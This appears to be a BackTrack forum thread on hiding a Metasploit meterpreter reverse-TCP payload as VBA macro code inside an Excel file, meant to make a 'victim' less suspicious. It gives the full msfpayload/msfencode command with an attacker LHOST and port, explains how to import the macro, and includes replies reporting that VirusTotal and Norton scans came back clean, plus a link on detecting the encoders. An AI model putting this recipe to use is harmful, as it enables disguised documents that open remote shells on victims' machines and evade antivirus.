This is also doable with PDF files, I remember reading an article on securinfos.infos a while back about how to do it.
Someone here was looking for non-exe type file (jpg?) so that the victim is less suspicious while running them. Well, an excel file may be the solution.
I used:
1. BT3 with msf v3.3
2. M$ office 2002 SP3 in a vista box
First, I generated a VBA code in a konsole in BT3 box:
I transferred the file to Windows, then, created an excel document, AND Tools>Macro>Visual Basic Editor. From the File>Import File>Browsed to the .cls file.Code:./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=7777 R | ./msfencode -b '' -t vba >> /root/Desktop/meterpreter.cls
Job done!
PS: Virustotal scans the excel file as clean. Can somebody check with Norton AV please...
If you can't explain it simply, you don't understand it well enough -- Albert Einstein
This is also doable with PDF files, I remember reading an article on securinfos.infos a while back about how to do it.
I agree, however the pdf file is caught by around 10 or so number of AV if tested in Virustotal.
If you can't explain it simply, you don't understand it well enough -- Albert Einstein
Hey,
So i created the file and scanned it using Norton AV 2008 running version 15.5.0.23 fully patched.(This is one of the newest versions). No threat was detected :P!! Hope this helps...![]()
Some good reading in relation to this thread.
I have since tried it out and well as the study shows it will be picked up.
hype-free: Detecting the Metasploit encryptors in one hour and 49 lines of Python
To be successful here you should read all of the following.
ForumRules
ForumFAQ
If you are new to Back|Track
Back|Track Wiki
Failure to do so will probably get your threads deleted or worse.
If you can't explain it simply, you don't understand it well enough -- Albert Einstein
To be successful here you should read all of the following.
ForumRules
ForumFAQ
If you are new to Back|Track
Back|Track Wiki
Failure to do so will probably get your threads deleted or worse.
I think their both the cat and the mouse.... :P AV companies that is.... hehe![]()